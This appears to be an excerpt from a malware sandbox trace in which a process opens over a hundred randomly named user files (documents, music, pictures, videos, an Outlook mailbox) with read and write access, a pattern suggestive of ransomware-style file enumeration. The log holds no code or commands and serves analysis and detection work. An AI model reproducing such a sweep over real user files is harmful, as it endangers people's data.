Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Dtk7xvzoVk_gCAUAkb.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EDFXHniYi.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\EGkqtCRNREaQo4XfBL.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G-R5IPPjXNO2pufW-w.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\k0bYHnrNfY0Z01.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kbQLv1HzRjuGX8_0 ow.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\M0viuAr.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mJD0Lk7dF2uj7fNWL.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mpW-3B9.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\NU9iOZGfDM.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ol37DpMB ADCzniH6.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OlNTdQSKj.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rMkTON600uD2.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\umnYAxK8Hd5gj.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yBWTsx0.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yNFdhsIRJWbx9.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\-Utu5uTreh3_BFU.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\2ZgBE.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\3lDgGO6UTyrOsMHE.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\5V1FT5g1rxSJJ41de.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\7HJiH UDq9SzzeN5I.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\8ywMFiXrJ1mJNTYk.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\Fnpi8zzFvSVq9mHNij76.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\HX-X27lPA60A4.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\i0vpbCxKUDj27FIiTrf.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\KbAGa_jf9A0p1.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\LgZcOmajdnsesY.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\nexJic6.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\NN082DlMLC6MxmlQyS42.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\tbTKJ0ZxbS6wZlGEphR.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\ucbmmg-N-J.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\wAomAj1M-1.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\wEWdm1lt.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\wHquroq M2bDSunIrjJ.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\XQtttNc8l WMW7IPg.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\_9l8.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\_D7Y.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\-W0-.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Aor58F2ltwiS2qWZJE.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\FDQ3v_tHbiNjViuE.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\hiUvM1waNbZk-e.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\jMNoGbN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\L4Lb_VKCFG5Baj3.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MCZaDa0QQJ6wcNZUXn.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\MkdmiW2n2hm UFrse-.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OFMo70Ypi.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\QoXfvFeQOhQIV.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\S4GQ2GGMfzy1DKUl.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\VyatE0vXWAqC0OxRt_.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\y18suG.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M45yR7c437.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ReEw7jE5wqOg.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\am8f6gN_e89TbRknT.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0oqCmMdMfyA -VyQ\gW8MJuJm9dKBS.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\4_mbPPGlzHp_oUuJ-H3Z.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\6lkmIZ.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\bYco6U CoNywT.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\sH_lIdhNg4 u9hq.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cJ1uF3yzdYr\UB qDPSTcD6SsAM5.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\4k4 81HVDXuJOl.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\eMppgNp_d0eONIt.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\ok1IxJmM0MNDy1z2SKRW.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\Rqjkx-Inyu564.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wpZkXn.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Qz91k6FGRf5u2kNaQ\wWuRiwRN3-J7Oj9WP.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\68l k.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\foWRjFtWYtlcWkIBF.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\l8IL3_dOyLyH.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\QITXJJCFSuy.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Yw9G-4_B\wYeZ7WgnHNP8l.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\AwfOXmr1.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\hd0rzFg.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\j34KVbd 7j.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\KeEk_O9.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lGrnoXKuinB.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\lWn6_.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\MChYwIiGCBst93Q.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\O_o33d.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\RU_Ytkp2w qp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\sGdLslAC.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\twAQxH8FOS.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\W783g cZVYe_Q3ZTfs.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bAXbPKiwKvGBE_6IlyS\_BaDSqvWqTCo.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\-ExuX9LOjl2Rf0Z.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\3mlI5OW4Ceei.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4iAitK.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\4X0WuHIKFlmcsmSj8wH.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\60jL.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\AfHqN B.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\u3J7SbbSL4_idzLNM.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\UYXfotd1.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\v9Hxi uz2vt-5XDoxdC.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\wpAW.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\1oLW\xRTD4.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\Gx9Mb.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\I42cS5 VvN3aGuFi.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vcVOmt\IE-asuVeDit5fMSdkB0.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
